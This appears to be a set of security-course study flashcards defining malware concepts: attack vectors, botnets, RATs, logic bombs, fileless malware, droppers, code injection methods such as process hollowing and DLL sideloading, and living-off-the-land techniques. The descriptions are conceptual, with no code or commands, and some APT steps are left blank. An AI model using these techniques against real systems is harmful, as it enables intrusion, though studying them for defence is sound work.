Section 3 Flashcards
There are two ways for malware to infect. What are they called?
Threat Vector
Attack Vector
What is a threat vector?
Method used by an attacker to access a victim’s machine
What is an attack vector?
Method used by an attacker to gain access to a victim’s machine in order
to infect it with malware
Malware infections usually start where?
within software, messaging, and media
What is a watering hole?
Malware is placed on a website that you know your potential victims will
access
What is a botnet?
A collection of compromised computers under the control of a master node
What is active interception?
Occurs when a computer is placed between the sender and receiver and
is able to capture or modify the traffic between them
What is privilege escalation?
Occurs when you are able to exploit a design flaw or bug in a system to
gain access to resources that a normal user isn’t able to access
____ are used to bypass normal security and authentication functions
Backdoors
Backdoors are highly discouraged in the modern technology world however a kind of backdoor still in use is…?
Remote Access Trojan (RAT) is placed by an attacker to maintain persistent
access
What is a logic bomb?
a type of malicious code embedded in software that remains dormant until specific conditions are met.
What is an Easter Egg?
Non-malicious code that when invoked, displays an insider joke, hidden
message, or secret feature
True or False: Logic bombs and Easter eggs should not be used according to secure coding standards
True
What are some symptoms of infection?
- Hard drives, files, or applications are not accessible anymore
▪ Strange noises occur
▪ Unusual error messages - Display looks strange
▪ Jumbled printouts
▪ Double file extensions are being displayed, such as textfile.txt.exe
▪ New files and folders have been created or files and folders are
missing/corrupted
▪ System Restore will not function
What are the ways that you can remove malware?
- Identify symptoms of a malware infection
o Quarantine the infected systems
o Disable System Restore (if using a Windows machine)
o Remediate the infected system
o Schedule automatic updates and scans
o Enable System Restore and create a new restore point
o Provide end user security awareness training
o If a boot sector virus is suspected, reboot the computer from an external device
and scan it
What is the best way to prevent a virus?
Anti-virus program like Norton or McAfee or using your computers Window Defender from your operating system
Continue to do service packs and updates from your operating system (patches)
Have a good host base firewall
When surfing the internet use encrypted websites
The best way to detect worms, trojans and ransomware is…?
Using anti-malware solutions. Ensure to keep your anti-malware solution up to date and current both for its definition and scanning engine.
What is the best way to prevent spyware?
Anti-spyware product. There are third-party products you can buy but Windows Defender already has this capability built into it. Make sure your definitions are up to date when using this so it can scan and detect properly.
Additionally, when browsing the internet make sure your browser security settings are set to non-trusted method. This means you won’t accept pop-ups or cookies.
How do you prevent rootkits?
Scanners can detect a rootkit before it is installed
If the rootkit has already been installed you will need to run a scan by booting from an external device. You most likely will want to reimage your machine
How do you prevent spam?
Verify your email servers aren’t configured as open mail relays or SMTP open
relays
Remove email addresses from website
Use whitelists and blacklists
Train and educate end users
What are the three best practices to remember when it comes to preventing malware?
- Update your anti-malware software automatically and scan your
computer
▪ Update and patch the operating system and applications regularly
▪ Educate and train end users on safe Internet surfing practices
What is a malware exploit technique?
Describes the specific method by which malware code infects a target host
Most modern malware uses ___ techniques to avoid detection by signature-based security software
fileless (By being fileless, this means that the malware is executed directly as a script or a small piece of shellcode that creates a process in the system memory without having to use the local file system.)
How does an APT use modern malware to operate?
Step 1: Dropper or Downloader - Now, a dropper is a specialized type of malware that’s designed to install or run other types of malware embedded in a payload on an infected host. Usually, this will be a stage one dropper, it’s that code you first got. And once you get that code and run it, it’s then going to go out and get some other code, and it uses a downloader do that. Now, a downloader is a piece of code that connects to the Internet to retrieve additional tools after the initial infection happens by a dropper.
Step 2: Maintain Access -
Step 3: Strengthen Access -
Step 4: Actions on objectives -
Step 5: Concealment -
What is a dropper?
Malware designed to install or run other types of malware embedded in a
payload on an infected host
What is a downloader?
A piece of code that connects to the Internet to retrieve additional tools after the
initial infection by a dropper
What is shellcode?
Any lightweight code designed to run an exploit on the target, which may include
any type of code format from scripting languages to binary code
What is code injection?
Exploit technique that runs malicious code with the identification number of
a legitimate process
*** Code injection is an exploit technique that runs malicious code with the identification number of a legit process. So, when I go to install this code, you’re going to notice that every process has a unique ID number with it. And so, if I have something that is allowed to run like the Explorer for Windows, and I decide to run malware and make you think I’m running it as the Explorer for Windows, I can hide that malware by injecting the code into that.That’s the idea of code injection.
What are some code injection techniques?
- Masquerading
▪ DLL injection
▪ DLL sideloading
▪ Process hollowing
How does masquerading code injection work?
Where your dropper is going to replace a genuine executable with a malicious one.
How does DLL code injection work?
Where the dropper starts forcing a process to load as part of the DLL. So, it’s going to load the DLL in the executable malicious code.
How does DLL sideloading work?
This is where the dropper is going to exploit a vulnerability in a legitimate program’s manifest to load a malicious DLL at runtime, and essentially you sideload by making it load this malicious thing.
How does process hollowing work?
This is when a dropper starts a process in a suspended state, and then rewrites the memory locations containing the process code with the malware code. So, essentially, we’re taking over someplace in memory and putting our malicious code in there.
Droppers are likely to implement ____ techniques to prevent detection and analysis
anti-forensics
When we talk about anti-forensic techniques, this is things like encrypting their payloads, or compressing their payloads, or obfuscating their payloads.
Exploit techniques that use standard system tools and packages to perform
intrusions
Living off the Land
For instance, they might use something like this, which is PowerShell. PowerShell can be used to do all sorts of malicious activities. And so, what we can do is, when we break into a system as a pentester or as an attacker, we can actually use your own PowerShell against you. If I’m on a Linux system, I can’t use PowerShell, but I can use Bash scripting. And so, again, if I use the tools that are native to your operating system, I am now using tools that were already installed for your administrators. And I’m using them in a malicious way. But it’s going to be really hard for you to detect that because I’m living off the land. So, if you fall victim to an attacker who is used to living off the land, the detection of that adversary is going to be much more difficult because they’re executing malware code within those standard tools and processes. And that makes it really hard to detect, and it’s going to allow them to stay on your system a lot longer.
What is APT?
An advanced persistent threat (APT) is a broad term used to describe an attack campaign in which an intruder, or team of intruders, establishes an illicit, long-term presence on a network in order to mine highly sensitive data.
